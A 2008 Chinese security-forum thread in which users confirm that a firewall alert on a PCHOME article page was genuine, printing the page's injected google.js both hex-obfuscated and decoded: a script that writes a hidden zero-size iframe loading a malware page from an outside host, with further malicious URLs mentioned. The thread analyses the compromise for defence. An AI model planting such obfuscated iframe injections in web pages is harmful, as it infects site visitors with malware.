关于费尔报PCHOME，没有误报

显示全部楼层 · 发表于 2008-1-5 15:54:45

今天看到好多人说费尔报PCHOME，不过我这里没报，网址是http://article.pchome.net/content-151335.html

点击上面的网址，我用GB，用view page 插件，查看脚本

根据菜包子说的，是google.js这个脚本，下载，用记事本打开，内容如下

function goad(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie1=Filter;expires="+ Then.toGMTString()
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');
window.status=" ";
}
}goad();

注意红色那部分，加密了，解密以后，得到

function goad(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie1=Filter;expires="+ Then.toGMTString()
window["document"]["writeln"]('<iframe height=0 width=0 src="[/color;]http://www.59.vc/page/add_644455.htm"></iframe>');
window.status=" ";
}
}goad();

iframe，结果很清楚了，是被挂马了，红伞的检测结果

证明费尔没有误报

显示全部楼层 · 发表于 2008-1-5 15:59:12

"hxxp://www.59.vc/page/add_644455.htm"

网马!汗啊!

[ 本帖最后由 samancy 于 2008-1-5 16:12 编辑 ]

显示全部楼层 · 发表于 2008-1-5 16:20:45

Pchome 好像经常被挂马，上次已经反映过了，费尔官方也证实不是误报。

显示全部楼层 · 发表于 2008-1-5 16:39:15

黑客啊，过节了也干活啊

显示全部楼层 · 发表于 2008-1-5 18:07:29

刺猬分析的那次吗？

显示全部楼层 · 发表于 2008-1-5 18:12:15

我刚才再解密hxxp://w18.vg/real.gif的时候才搜索到刺猬分析的那次，不知道他怎么解密那个源码的，我刚才在view page里点了几下出来了，但是现在又点不出来了似乎是ascii码和大小写的转换

[ 本帖最后由 zzh161 于 2008-1-5 18:14 编辑 ]

显示全部楼层 · 发表于 2008-1-5 18:23:20

刺猬分析的，说是flash激活的，所有含flash的网页都有问题

显示全部楼层 · 发表于 2008-1-5 18:27:21

很少上PCH了。

显示全部楼层 · 发表于 2008-1-5 18:28:13

我现在是在找那个病毒，他的blog我看了，不过没写怎么解密那段网页，我继续寻觅中

显示全部楼层 · 发表于 2008-1-5 20:40:58

到底是zzh161 RP问题，别人都报，就是你的不报

[费尔] 关于费尔报PCHOME，没有误报

本帖子中包含更多资源

回复 5楼费饭饭的帖子

回复 7楼费饭饭的帖子

浏览过的版块

[费尔] 关于费尔报PCHOME，没有误报

本帖子中包含更多资源

回复 5楼 费饭饭 的帖子

回复 7楼 费饭饭 的帖子

浏览过的版块

回复 5楼费饭饭的帖子

回复 7楼费饭饭的帖子